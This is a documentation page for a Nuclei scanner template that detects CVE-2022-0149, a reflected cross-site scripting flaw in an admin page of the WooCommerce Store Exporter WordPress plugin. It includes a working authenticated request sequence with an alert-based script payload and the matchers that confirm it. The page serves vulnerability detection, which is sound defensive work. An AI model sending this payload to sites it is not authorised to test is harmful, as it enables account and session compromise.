WooCommerce Stored Exporter WordPress Plugin < 2.7.1 - Cross-Site Scripting
ID: CVE-2022-0149
Severity: medium
Author: dhiyaneshDk
Tags: cve,cve2022,wpscan,wordpress,wp-plugin,xss,woocommerce,authenticated,visser
Description
Section titled “Description”The plugin was affected by a reflected cross-site scripting vulnerability in the woo_ce admin page.
YAML Source
Section titled “YAML Source”id: CVE-2022-0149
info: name: WooCommerce Stored Exporter WordPress Plugin < 2.7.1 - Cross-Site Scripting author: dhiyaneshDk severity: medium description: The plugin was affected by a reflected cross-site scripting vulnerability in the woo_ce admin page. impact: | Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of a victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Update to the latest version of the WooCommerce Stored Exporter WordPress Plugin (2.7.1) or apply the vendor-provided patch to mitigate this vulnerability. reference: - https://wpscan.com/vulnerability/e47c288a-2ea3-4926-93cc-113867cbc77c - https://nvd.nist.gov/vuln/detail/CVE-2022-0149 - https://plugins.trac.wordpress.org/changeset/2654545/woocommerce-exporter - https://github.com/ARPSyndicate/cvemon - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-0149 cwe-id: CWE-79 epss-score: 0.001 epss-percentile: 0.41295 cpe: cpe:2.3:a:visser:store_exporter_for_woocommerce:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 vendor: visser product: store_exporter_for_woocommerce framework: wordpress tags: cve,cve2022,wpscan,wordpress,wp-plugin,xss,woocommerce,authenticated,visser
http: - raw: - | POST /wp-login.php HTTP/1.1 Host: {{Hostname}} Origin: {{RootURL}} Content-Type: application/x-www-form-urlencoded Cookie: wordpress_test_cookie=WP%20Cookie%20check
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 - | GET /wp-admin/admin.php?page=woo_ce&failed=1&message=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1 Host: {{Hostname}}
matchers-condition: and matchers: - type: word part: body words: - "</script><script>alert(document.domain)</script>"
- type: word part: header words: - text/html
- type: status status: - 200# digest: 4a0a00473045022100b5d8d713a920828aab7ef00149e8f22383e96b8d8dbd97d56088b82f4f14bc9f02207806b5ef6d24a217b03fd1b2b00d4e5ae1679274a29af5b62e009466e84e7aed:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-0149.yaml"